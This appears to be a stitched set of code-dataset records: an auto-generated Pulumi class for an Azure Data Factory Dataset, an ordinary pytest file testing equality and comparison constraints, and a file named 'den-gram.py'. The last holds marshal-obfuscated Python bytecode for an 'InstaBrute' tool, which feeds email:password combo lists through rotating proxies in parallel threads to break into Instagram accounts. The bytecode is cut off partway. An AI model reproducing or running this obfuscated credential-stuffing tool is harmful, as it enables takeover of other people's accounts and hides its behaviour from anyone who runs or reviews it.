@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dataset_name: Optional[pulumi.Input[str]] = None,
factory_name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[Union[pulumi.InputType['AmazonMWSObjectDatasetArgs'], pulumi.InputType['AmazonRedshiftTableDatasetArgs'], pulumi.InputType['AmazonS3DatasetArgs'], pulumi.InputType['AvroDatasetArgs'], pulumi.InputType['AzureBlobDatasetArgs'], pulumi.InputType['AzureBlobFSDatasetArgs'], pulumi.InputType['AzureDataExplorerTableDatasetArgs'], pulumi.InputType['AzureDataLakeStoreDatasetArgs'], pulumi.InputType['AzureDatabricksDeltaLakeDatasetArgs'], pulumi.InputType['AzureMariaDBTableDatasetArgs'], pulumi.InputType['AzureMySqlTableDatasetArgs'], pulumi.InputType['AzurePostgreSqlTableDatasetArgs'], pulumi.InputType['AzureSearchIndexDatasetArgs'], pulumi.InputType['AzureSqlDWTableDatasetArgs'], pulumi.InputType['AzureSqlMITableDatasetArgs'], pulumi.InputType['AzureSqlTableDatasetArgs'], pulumi.InputType['AzureTableDatasetArgs'], pulumi.InputType['BinaryDatasetArgs'], pulumi.InputType['CassandraTableDatasetArgs'], pulumi.InputType['CommonDataServiceForAppsEntityDatasetArgs'], pulumi.InputType['ConcurObjectDatasetArgs'], pulumi.InputType['CosmosDbMongoDbApiCollectionDatasetArgs'], pulumi.InputType['CosmosDbSqlApiCollectionDatasetArgs'], pulumi.InputType['CouchbaseTableDatasetArgs'], pulumi.InputType['CustomDatasetArgs'], pulumi.InputType['Db2TableDatasetArgs'], pulumi.InputType['DelimitedTextDatasetArgs'], pulumi.InputType['DocumentDbCollectionDatasetArgs'], pulumi.InputType['DrillTableDatasetArgs'], pulumi.InputType['DynamicsAXResourceDatasetArgs'], pulumi.InputType['DynamicsCrmEntityDatasetArgs'], pulumi.InputType['DynamicsEntityDatasetArgs'], pulumi.InputType['EloquaObjectDatasetArgs'], pulumi.InputType['ExcelDatasetArgs'], pulumi.InputType['FileShareDatasetArgs'], pulumi.InputType['GoogleAdWordsObjectDatasetArgs'], pulumi.InputType['GoogleBigQueryObjectDatasetArgs'], pulumi.InputType['GreenplumTableDatasetArgs'], pulumi.InputType['HBaseObjectDatasetArgs'], pulumi.InputType['HiveObjectDatasetArgs'], pulumi.InputType['HttpDatasetArgs'], pulumi.InputType['HubspotObjectDatasetArgs'], pulumi.InputType['ImpalaObjectDatasetArgs'], pulumi.InputType['InformixTableDatasetArgs'], pulumi.InputType['JiraObjectDatasetArgs'], pulumi.InputType['JsonDatasetArgs'], pulumi.InputType['MagentoObjectDatasetArgs'], pulumi.InputType['MariaDBTableDatasetArgs'], pulumi.InputType['MarketoObjectDatasetArgs'], pulumi.InputType['MicrosoftAccessTableDatasetArgs'], pulumi.InputType['MongoDbAtlasCollectionDatasetArgs'], pulumi.InputType['MongoDbCollectionDatasetArgs'], pulumi.InputType['MongoDbV2CollectionDatasetArgs'], pulumi.InputType['MySqlTableDatasetArgs'], pulumi.InputType['NetezzaTableDatasetArgs'], pulumi.InputType['ODataResourceDatasetArgs'], pulumi.InputType['OdbcTableDatasetArgs'], pulumi.InputType['Office365DatasetArgs'], pulumi.InputType['OracleServiceCloudObjectDatasetArgs'], pulumi.InputType['OracleTableDatasetArgs'], pulumi.InputType['OrcDatasetArgs'], pulumi.InputType['ParquetDatasetArgs'], pulumi.InputType['PaypalObjectDatasetArgs'], pulumi.InputType['PhoenixObjectDatasetArgs'], pulumi.InputType['PostgreSqlTableDatasetArgs'], pulumi.InputType['PrestoObjectDatasetArgs'], pulumi.InputType['QuickBooksObjectDatasetArgs'], pulumi.InputType['RelationalTableDatasetArgs'], pulumi.InputType['ResponsysObjectDatasetArgs'], pulumi.InputType['RestResourceDatasetArgs'], pulumi.InputType['SalesforceMarketingCloudObjectDatasetArgs'], pulumi.InputType['SalesforceObjectDatasetArgs'], pulumi.InputType['SalesforceServiceCloudObjectDatasetArgs'], pulumi.InputType['SapBwCubeDatasetArgs'], pulumi.InputType['SapCloudForCustomerResourceDatasetArgs'], pulumi.InputType['SapEccResourceDatasetArgs'], pulumi.InputType['SapHanaTableDatasetArgs'], pulumi.InputType['SapOpenHubTableDatasetArgs'], pulumi.InputType['SapTableResourceDatasetArgs'], pulumi.InputType['ServiceNowObjectDatasetArgs'], pulumi.InputType['SharePointOnlineListResourceDatasetArgs'], pulumi.InputType['ShopifyObjectDatasetArgs'], pulumi.InputType['SnowflakeDatasetArgs'], pulumi.InputType['SparkObjectDatasetArgs'], pulumi.InputType['SqlServerTableDatasetArgs'], pulumi.InputType['SquareObjectDatasetArgs'], pulumi.InputType['SybaseTableDatasetArgs'], pulumi.InputType['TeradataTableDatasetArgs'], pulumi.InputType['VerticaTableDatasetArgs'], pulumi.InputType['WebTableDatasetArgs'], pulumi.InputType['XeroObjectDatasetArgs'], pulumi.InputType['XmlDatasetArgs'], pulumi.InputType['ZohoObjectDatasetArgs']]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Dataset resource type.
API Version: 2018-06-01.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] dataset_name: The dataset name.
:param pulumi.Input[str] factory_name: The factory name.
:param pulumi.Input[Union[pulumi.InputType['AmazonMWSObjectDatasetArgs'], pulumi.InputType['AmazonRedshiftTableDatasetArgs'], pulumi.InputType['AmazonS3DatasetArgs'], pulumi.InputType['AvroDatasetArgs'], pulumi.InputType['AzureBlobDatasetArgs'], pulumi.InputType['AzureBlobFSDatasetArgs'], pulumi.InputType['AzureDataExplorerTableDatasetArgs'], pulumi.InputType['AzureDataLakeStoreDatasetArgs'], pulumi.InputType['AzureDatabricksDeltaLakeDatasetArgs'], pulumi.InputType['AzureMariaDBTableDatasetArgs'], pulumi.InputType['AzureMySqlTableDatasetArgs'], pulumi.InputType['AzurePostgreSqlTableDatasetArgs'], pulumi.InputType['AzureSearchIndexDatasetArgs'], pulumi.InputType['AzureSqlDWTableDatasetArgs'], pulumi.InputType['AzureSqlMITableDatasetArgs'], pulumi.InputType['AzureSqlTableDatasetArgs'], pulumi.InputType['AzureTableDatasetArgs'], pulumi.InputType['BinaryDatasetArgs'], pulumi.InputType['CassandraTableDatasetArgs'], pulumi.InputType['CommonDataServiceForAppsEntityDatasetArgs'], pulumi.InputType['ConcurObjectDatasetArgs'], pulumi.InputType['CosmosDbMongoDbApiCollectionDatasetArgs'], pulumi.InputType['CosmosDbSqlApiCollectionDatasetArgs'], pulumi.InputType['CouchbaseTableDatasetArgs'], pulumi.InputType['CustomDatasetArgs'], pulumi.InputType['Db2TableDatasetArgs'], pulumi.InputType['DelimitedTextDatasetArgs'], pulumi.InputType['DocumentDbCollectionDatasetArgs'], pulumi.InputType['DrillTableDatasetArgs'], pulumi.InputType['DynamicsAXResourceDatasetArgs'], pulumi.InputType['DynamicsCrmEntityDatasetArgs'], pulumi.InputType['DynamicsEntityDatasetArgs'], pulumi.InputType['EloquaObjectDatasetArgs'], pulumi.InputType['ExcelDatasetArgs'], pulumi.InputType['FileShareDatasetArgs'], pulumi.InputType['GoogleAdWordsObjectDatasetArgs'], pulumi.InputType['GoogleBigQueryObjectDatasetArgs'], pulumi.InputType['GreenplumTableDatasetArgs'], pulumi.InputType['HBaseObjectDatasetArgs'], pulumi.InputType['HiveObjectDatasetArgs'], pulumi.InputType['HttpDatasetArgs'], pulumi.InputType['HubspotObjectDatasetArgs'], pulumi.InputType['ImpalaObjectDatasetArgs'], pulumi.InputType['InformixTableDatasetArgs'], pulumi.InputType['JiraObjectDatasetArgs'], pulumi.InputType['JsonDatasetArgs'], pulumi.InputType['MagentoObjectDatasetArgs'], pulumi.InputType['MariaDBTableDatasetArgs'], pulumi.InputType['MarketoObjectDatasetArgs'], pulumi.InputType['MicrosoftAccessTableDatasetArgs'], pulumi.InputType['MongoDbAtlasCollectionDatasetArgs'], pulumi.InputType['MongoDbCollectionDatasetArgs'], pulumi.InputType['MongoDbV2CollectionDatasetArgs'], pulumi.InputType['MySqlTableDatasetArgs'], pulumi.InputType['NetezzaTableDatasetArgs'], pulumi.InputType['ODataResourceDatasetArgs'], pulumi.InputType['OdbcTableDatasetArgs'], pulumi.InputType['Office365DatasetArgs'], pulumi.InputType['OracleServiceCloudObjectDatasetArgs'], pulumi.InputType['OracleTableDatasetArgs'], pulumi.InputType['OrcDatasetArgs'], pulumi.InputType['ParquetDatasetArgs'], pulumi.InputType['PaypalObjectDatasetArgs'], pulumi.InputType['PhoenixObjectDatasetArgs'], pulumi.InputType['PostgreSqlTableDatasetArgs'], pulumi.InputType['PrestoObjectDatasetArgs'], pulumi.InputType['QuickBooksObjectDatasetArgs'], pulumi.InputType['RelationalTableDatasetArgs'], pulumi.InputType['ResponsysObjectDatasetArgs'], pulumi.InputType['RestResourceDatasetArgs'], pulumi.InputType['SalesforceMarketingCloudObjectDatasetArgs'], pulumi.InputType['SalesforceObjectDatasetArgs'], pulumi.InputType['SalesforceServiceCloudObjectDatasetArgs'], pulumi.InputType['SapBwCubeDatasetArgs'], pulumi.InputType['SapCloudForCustomerResourceDatasetArgs'], pulumi.InputType['SapEccResourceDatasetArgs'], pulumi.InputType['SapHanaTableDatasetArgs'], pulumi.InputType['SapOpenHubTableDatasetArgs'], pulumi.InputType['SapTableResourceDatasetArgs'], pulumi.InputType['ServiceNowObjectDatasetArgs'], pulumi.InputType['SharePointOnlineListResourceDatasetArgs'], pulumi.InputType['ShopifyObjectDatasetArgs'], pulumi.InputType['SnowflakeDatasetArgs'], pulumi.InputType['SparkObjectDatasetArgs'], pulumi.InputType['SqlServerTableDatasetArgs'], pulumi.InputType['SquareObjectDatasetArgs'], pulumi.InputType['SybaseTableDatasetArgs'], pulumi.InputType['TeradataTableDatasetArgs'], pulumi.InputType['VerticaTableDatasetArgs'], pulumi.InputType['WebTableDatasetArgs'], pulumi.InputType['XeroObjectDatasetArgs'], pulumi.InputType['XmlDatasetArgs'], pulumi.InputType['ZohoObjectDatasetArgs']]] properties: Dataset properties.
:param pulumi.Input[str] resource_group_name: The resource group name.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DatasetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Dataset resource type.
API Version: 2018-06-01.
:param str resource_name: The name of the resource.
:param DatasetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DatasetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dataset_name: Optional[pulumi.Input[str]] = None,
factory_name: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[Union[pulumi.InputType['AmazonMWSObjectDatasetArgs'], pulumi.InputType['AmazonRedshiftTableDatasetArgs'], pulumi.InputType['AmazonS3DatasetArgs'], pulumi.InputType['AvroDatasetArgs'], pulumi.InputType['AzureBlobDatasetArgs'], pulumi.InputType['AzureBlobFSDatasetArgs'], pulumi.InputType['AzureDataExplorerTableDatasetArgs'], pulumi.InputType['AzureDataLakeStoreDatasetArgs'], pulumi.InputType['AzureDatabricksDeltaLakeDatasetArgs'], pulumi.InputType['AzureMariaDBTableDatasetArgs'], pulumi.InputType['AzureMySqlTableDatasetArgs'], pulumi.InputType['AzurePostgreSqlTableDatasetArgs'], pulumi.InputType['AzureSearchIndexDatasetArgs'], pulumi.InputType['AzureSqlDWTableDatasetArgs'], pulumi.InputType['AzureSqlMITableDatasetArgs'], pulumi.InputType['AzureSqlTableDatasetArgs'], pulumi.InputType['AzureTableDatasetArgs'], pulumi.InputType['BinaryDatasetArgs'], pulumi.InputType['CassandraTableDatasetArgs'], pulumi.InputType['CommonDataServiceForAppsEntityDatasetArgs'], pulumi.InputType['ConcurObjectDatasetArgs'], pulumi.InputType['CosmosDbMongoDbApiCollectionDatasetArgs'], pulumi.InputType['CosmosDbSqlApiCollectionDatasetArgs'], pulumi.InputType['CouchbaseTableDatasetArgs'], pulumi.InputType['CustomDatasetArgs'], pulumi.InputType['Db2TableDatasetArgs'], pulumi.InputType['DelimitedTextDatasetArgs'], pulumi.InputType['DocumentDbCollectionDatasetArgs'], pulumi.InputType['DrillTableDatasetArgs'], pulumi.InputType['DynamicsAXResourceDatasetArgs'], pulumi.InputType['DynamicsCrmEntityDatasetArgs'], pulumi.InputType['DynamicsEntityDatasetArgs'], pulumi.InputType['EloquaObjectDatasetArgs'], pulumi.InputType['ExcelDatasetArgs'], pulumi.InputType['FileShareDatasetArgs'], pulumi.InputType['GoogleAdWordsObjectDatasetArgs'], pulumi.InputType['GoogleBigQueryObjectDatasetArgs'], pulumi.InputType['GreenplumTableDatasetArgs'], pulumi.InputType['HBaseObjectDatasetArgs'], pulumi.InputType['HiveObjectDatasetArgs'], pulumi.InputType['HttpDatasetArgs'], pulumi.InputType['HubspotObjectDatasetArgs'], pulumi.InputType['ImpalaObjectDatasetArgs'], pulumi.InputType['InformixTableDatasetArgs'], pulumi.InputType['JiraObjectDatasetArgs'], pulumi.InputType['JsonDatasetArgs'], pulumi.InputType['MagentoObjectDatasetArgs'], pulumi.InputType['MariaDBTableDatasetArgs'], pulumi.InputType['MarketoObjectDatasetArgs'], pulumi.InputType['MicrosoftAccessTableDatasetArgs'], pulumi.InputType['MongoDbAtlasCollectionDatasetArgs'], pulumi.InputType['MongoDbCollectionDatasetArgs'], pulumi.InputType['MongoDbV2CollectionDatasetArgs'], pulumi.InputType['MySqlTableDatasetArgs'], pulumi.InputType['NetezzaTableDatasetArgs'], pulumi.InputType['ODataResourceDatasetArgs'], pulumi.InputType['OdbcTableDatasetArgs'], pulumi.InputType['Office365DatasetArgs'], pulumi.InputType['OracleServiceCloudObjectDatasetArgs'], pulumi.InputType['OracleTableDatasetArgs'], pulumi.InputType['OrcDatasetArgs'], pulumi.InputType['ParquetDatasetArgs'], pulumi.InputType['PaypalObjectDatasetArgs'], pulumi.InputType['PhoenixObjectDatasetArgs'], pulumi.InputType['PostgreSqlTableDatasetArgs'], pulumi.InputType['PrestoObjectDatasetArgs'], pulumi.InputType['QuickBooksObjectDatasetArgs'], pulumi.InputType['RelationalTableDatasetArgs'], pulumi.InputType['ResponsysObjectDatasetArgs'], pulumi.InputType['RestResourceDatasetArgs'], pulumi.InputType['SalesforceMarketingCloudObjectDatasetArgs'], pulumi.InputType['SalesforceObjectDatasetArgs'], pulumi.InputType['SalesforceServiceCloudObjectDatasetArgs'], pulumi.InputType['SapBwCubeDatasetArgs'], pulumi.InputType['SapCloudForCustomerResourceDatasetArgs'], pulumi.InputType['SapEccResourceDatasetArgs'], pulumi.InputType['SapHanaTableDatasetArgs'], pulumi.InputType['SapOpenHubTableDatasetArgs'], pulumi.InputType['SapTableResourceDatasetArgs'], pulumi.InputType['ServiceNowObjectDatasetArgs'], pulumi.InputType['SharePointOnlineListResourceDatasetArgs'], pulumi.InputType['ShopifyObjectDatasetArgs'], pulumi.InputType['SnowflakeDatasetArgs'], pulumi.InputType['SparkObjectDatasetArgs'], pulumi.InputType['SqlServerTableDatasetArgs'], pulumi.InputType['SquareObjectDatasetArgs'], pulumi.InputType['SybaseTableDatasetArgs'], pulumi.InputType['TeradataTableDatasetArgs'], pulumi.InputType['VerticaTableDatasetArgs'], pulumi.InputType['WebTableDatasetArgs'], pulumi.InputType['XeroObjectDatasetArgs'], pulumi.InputType['XmlDatasetArgs'], pulumi.InputType['ZohoObjectDatasetArgs']]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DatasetArgs.__new__(DatasetArgs)
__props__.__dict__["dataset_name"] = dataset_name
if factory_name is None and not opts.urn:
raise TypeError("Missing required property 'factory_name'")
__props__.__dict__["factory_name"] = factory_name
if properties is None and not opts.urn:
raise TypeError("Missing required property 'properties'")
__props__.__dict__["properties"] = properties
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:datafactory:Dataset"), pulumi.Alias(type_="azure-native:datafactory/v20170901preview:Dataset"), pulumi.Alias(type_="azure-nextgen:datafactory/v20170901preview:Dataset"), pulumi.Alias(type_="azure-native:datafactory/v20180601:Dataset"), pulumi.Alias(type_="azure-nextgen:datafactory/v20180601:Dataset")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Dataset, __self__).__init__(
'azure-native:datafactory:Dataset',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Dataset':
"""
Get an existing Dataset resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = DatasetArgs.__new__(DatasetArgs)
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["properties"] = None
__props__.__dict__["type"] = None
return Dataset(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
Etag identifies change in the resource.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> pulumi.Output[Any]:
"""
Dataset properties.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The resource type.
"""
return pulumi.get(self, "type")
| 146.711712
| 4,437
| 0.7965
| 2,165
| 32,570
| 11.839723
| 0.107159
| 0.163266
| 0.012562
| 0.007724
| 0.917801
| 0.895564
| 0.882417
| 0.858191
| 0.852417
| 0.845863
| 0
| 0.003071
| 0.090083
| 32,570
| 221
| 4,438
| 147.375566
| 0.861857
| 0.267178
| 0
| 0.321168
| 1
| 0
| 0.532855
| 0.439708
| 0
| 0
| 0
| 0
| 0
| 1
| 0.131387
| false
| 0.007299
| 0.058394
| 0
| 0.270073
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
b2bacb9b01e22c028fbb0e67098b278d8e920573
| 2,790
|
py
|
Python
|
tests/test_constraints.py
|
utahnlp/madlibs
|
6a41051ea79599971e76b31023fcdb2b7f067eab
|
[
"MIT"
] | null | null | null |
tests/test_constraints.py
|
utahnlp/madlibs
|
6a41051ea79599971e76b31023fcdb2b7f067eab
|
[
"MIT"
] | null | null | null |
tests/test_constraints.py
|
utahnlp/madlibs
|
6a41051ea79599971e76b31023fcdb2b7f067eab
|
[
"MIT"
] | null | null | null |
import pytest
from madlibs.constraints import make_constraint
def test_equality_constraint():
c = make_constraint("equals", "a", "b")
assert c.check({"a": "1", "b": "1"})
assert not c.check({"a": "1", "b": "2"})
assert c.check({"a": "apple", "b": "apple"})
assert not c.check({"a": "apple", "b": "cat"})
def test_equality_exceptions():
with pytest.raises(Exception):
c = make_constraint("equals", "a")
with pytest.raises(Exception):
c = make_constraint("equals", "a", "b", "c")
with pytest.raises(Exception):
c = make_constraint("equals", "a", "b")
c.check({"a": "1"})
with pytest.raises(Exception):
c = make_constraint("equals", "a", "b")
c.check({"b": "1"})
def test_inequality_constraint():
c = make_constraint("not_equals", "a", "b")
assert not c.check({"a": "1", "b": "1"})
assert c.check({"a": "1", "b": "2"})
assert not c.check({"a": "apple", "b": "apple"})
assert c.check({"a": "apple", "b": "cat"})
def test_inequality_exceptions():
with pytest.raises(Exception):
c = make_constraint("not_equals", "a")
with pytest.raises(Exception):
c = make_constraint("not_equals", "a", "b", "c")
with pytest.raises(Exception):
c = make_constraint("not_equals", "a", "b")
c.check({"a": "1"})
with pytest.raises(Exception):
c = make_constraint("not_equals", "a", "b")
c.check({"b": "1"})
def test_less_than_constraint():
c = make_constraint("less_than", "a", "b")
assert not c.check({"a": "1", "b": "1"})
assert c.check({"a": "1", "b": "2"})
assert not c.check({"a": "2", "b": "1"})
def test_less_than_exceptions():
with pytest.raises(Exception):
c = make_constraint("less_than", "a")
with pytest.raises(Exception):
c = make_constraint("less_than", "a", "b", "c")
with pytest.raises(Exception):
c = make_constraint("less_than", "a", "b")
c.check({"a": "1"})
with pytest.raises(Exception):
c = make_constraint("less_than", "a", "b")
c.check({"b": "1"})
def test_greater_than_constraint():
c = make_constraint("greater_than", "a", "b")
assert not c.check({"a": "1", "b": "1"})
assert not c.check({"a": "1", "b": "2"})
assert c.check({"a": "2", "b": "1"})
def test_greater_than_exceptions():
with pytest.raises(Exception):
c = make_constraint("greater_than", "a")
with pytest.raises(Exception):
c = make_constraint("greater_than", "a", "b", "c")
with pytest.raises(Exception):
c = make_constraint("greater_than", "a", "b")
c.check({"a": "1"})
with pytest.raises(Exception):
c = make_constraint("greater_than", "a", "b")
c.check({"b": "1"})
| 27.9
| 58
| 0.562724
| 381
| 2,790
| 3.973753
| 0.076115
| 0.087186
| 0.198151
| 0.264201
| 0.922721
| 0.909511
| 0.870542
| 0.801849
| 0.739102
| 0.677675
| 0
| 0.012826
| 0.217563
| 2,790
| 99
| 59
| 28.181818
| 0.680715
| 0
| 0
| 0.632353
| 0
| 0
| 0.116487
| 0
| 0
| 0
| 0
| 0
| 0.205882
| 1
| 0.117647
| false
| 0
| 0.029412
| 0
| 0.147059
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6527a1acdaf9512533096f431a864adf4b7ac246
| 14,735
|
py
|
Python
|
den-gram.py
|
ICT154/den-gram
|
c3f03e87637bde3b5064b2fdf4a81c3e29885ea9
|
[
"Apache-2.0"
] | 3
|
2020-07-17T07:06:48.000Z
|
2021-08-31T02:07:47.000Z
|
den-gram.py
|
ICT154/den-gram
|
c3f03e87637bde3b5064b2fdf4a81c3e29885ea9
|
[
"Apache-2.0"
] | null | null | null |
den-gram.py
|
ICT154/den-gram
|
c3f03e87637bde3b5064b2fdf4a81c3e29885ea9
|
[
"Apache-2.0"
] | 3
|
2019-11-26T11:14:16.000Z
|
2020-04-29T06:43:44.000Z
|
#Compiled By xNot_Found
#Github : https://github.com/ICT154
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s\xb8\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x02\x00l\x05\x00m\x06\x00Z\x06\x00\x01e\x07\x00e\x01\x00j\x08\x00\x83\x01\x00Z\t\x00d\x03\x00Z\n\x00d\x04\x00Z\x0b\x00d\x05\x00Z\x0c\x00d\x06\x00Z\r\x00d\x07\x00Z\x0e\x00d\x08\x00Z\x0f\x00d\t\x00Z\x10\x00d\n\x00Z\x11\x00d\x0b\x00e\x12\x00f\x01\x00d\x0c\x00\x84\x00\x00\x83\x00\x00YZ\x13\x00e\x13\x00\x83\x00\x00\x01d\x01\x00S(\r\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x07\x00\x00\x00randints\x05\x00\x00\x00\x1b[31ms\x05\x00\x00\x00\x1b[32ms\x05\x00\x00\x00\x1b[33ms\x05\x00\x00\x00\x1b[34ms\x05\x00\x00\x00\x1b[35ms\x05\x00\x00\x00\x1b[36ms\x05\x00\x00\x00\x1b[37ms\x05\x00\x00\x00\x1b[39mt\n\x00\x00\x00InstaBrutec\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00B\x00\x00\x00s>\x00\x00\x00e\x00\x00Z\x01\x00d\x00\x00\x84\x00\x00Z\x02\x00d\x01\x00\x84\x00\x00Z\x03\x00d\x02\x00\x84\x00\x00Z\x04\x00d\x03\x00\x84\x00\x00Z\x05\x00d\x04\x00\x84\x00\x00Z\x06\x00d\x05\x00\x84\x00\x00Z\x07\x00RS(\x06\x00\x00\x00c\x01\x00\x00\x00\x0c\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s\xda\x01\x00\x00|\x00\x00j\x00\x00\x83\x00\x00\x01|\x00\x00j\x01\x00\x83\x00\x00\x01y=\x00t\x02\x00d\x01\x00\x83\x01\x00}\x01\x00t\x02\x00d\x02\x00\x83\x01\x00}\x02\x00|\x00\x00j\x00\x00\x83\x00\x00\x01|\x00\x00j\x01\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x03\x00\x83\x01\x00\x01Wn*\x00\x01\x01\x01|\x00\x00j\x00\x00\x83\x00\x00\x01|\x00\x00j\x01\x00\x83\x00\x00\x01d\x04\x00GHt\x05\x00j\x06\x00\x83\x00\x00\x01n\x01\x00Xt\x07\x00t\x08\x00|\x02\x00\x83\x01\x00j\t\x00\x83\x00\x00j\n\x00\x83\x00\x00\x83\x01\x00|\x00\x00_\x0b\x00t\x08\x00|\x01\x00d\x05\x00\x83\x02\x00\x8f\x19\x00}\x03\x00|\x03\x00j\t\x00\x83\x00\x00j\n\x00\x83\x00\x00}\x04\x00Wd\x00\x00QXg\x00\x00}\x05\x00d\x06\x00|\x00\x00_\x0c\x00x\xd6\x00|\x04\x00D]\xce\x00}\x06\x00|\x00\x00j\x0c\x00t\r\x00|\x00\x00j\x0b\x00\x83\x01\x00k\x05\x00r\t\x01d\x06\x00|\x00\x00_\x0c\x00n\x00\x00|\x00\x00j\x0e\x00|\x00\x00j\x0c\x00\x83\x01\x00}\x07\x00|\x00\x00j\x0c\x00d\x07\x00\x17|\x00\x00_\x0c\x00|\x06\x00j\x0f\x00d\x08\x00\x83\x01\x00d\x06\x00\x19}\x08\x00|\x06\x00j\x0f\x00d\x08\x00\x83\x01\x00d\x07\x00\x19}\t\x00yR\x00t\x10\x00j\x11\x00d\t\x00|\x00\x00j\x12\x00d\n\x00|\x08\x00|\t\x00t\x13\x00|\x07\x00\x83\x01\x00f\x03\x00\x83\x00\x02}\n\x00|\n\x00j\x14\x00\x83\x00\x00\x01|\x05\x00j\x15\x00|\n\x00\x83\x01\x00\x01t\x16\x00j\x17\x00d\x0b\x00\x83\x01\x00\x01Wq\xdf\x00\x01\x01\x01q\xdf\x00Xq\xdf\x00Wx\x18\x00|\x05\x00D]\x10\x00}\x0b\x00|\x0b\x00j\x18\x00\x83\x00\x00\x01q\xb8\x01Wt\x19\x00d\x0c\x00\x83\x01\x00\x01d\x00\x00S(\r\x00\x00\x00Ns\'\x00\x00\x00 [?] Masukan List Email : Password --> s*\x00\x00\x00 [?] Masukan List Proxy (harus fresh) --> s%\x00\x00\x00xdg-open https://youtu.be/gwdTLnFBuEws*\x00\x00\x00 [!] Error , Silahkan Hubungi Author [!] t\x01\x00\x00\x00ri\x00\x00\x00\x00i\x01\x00\x00\x00t\x01\x00\x00\x00:t\x06\x00\x00\x00targett\x04\x00\x00\x00argsg\x9a\x99\x99\x99\x99\x99\xb9?s*\x00\x00\x00 [+] Selesai , Tekan Enter Untuk Keluar...(\x1a\x00\x00\x00t\x03\x00\x00\x00clst\n\x00\x00\x00print_logot\t\x00\x00\x00raw_inputt\x02\x00\x00\x00ost\x06\x00\x00\x00systemt\x03\x00\x00\x00syst\x04\x00\x00\x00exitt\x04\x00\x00\x00listt\x04\x00\x00\x00opent\x04\x00\x00\x00readt\n\x00\x00\x00splitlinest\t\x00\x00\x00proxylistt\x08\x00\x00\x00Coutproxt\x03\x00\x00\x00lent\x0e\x00\x00\x00Generate_Proxyt\x05\x00\x00\x00splitt\t\x00\x00\x00threadingt\x06\x00\x00\x00Threadt\x02\x00\x00\x00Got\x03\x00\x00\x00strt\x05\x00\x00\x00startt\x06\x00\x00\x00appendt\x04\x00\x00\x00timet\x05\x00\x00\x00sleept\x04\x00\x00\x00joint\x05\x00\x00\x00input(\x0c\x00\x00\x00t\x04\x00\x00\x00selft\x05\x00\x00\x00Combot\x05\x00\x00\x00Proxyt\x01\x00\x00\x00xt\t\x00\x00\x00Combolistt\x06\x00\x00\x00threadt\x05\x00\x00\x00combot\x05\x00\x00\x00proxyt\x04\x00\x00\x00usert\x08\x00\x00\x00passwordt\x01\x00\x00\x00tt\x01\x00\x00\x00j(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x08\x00\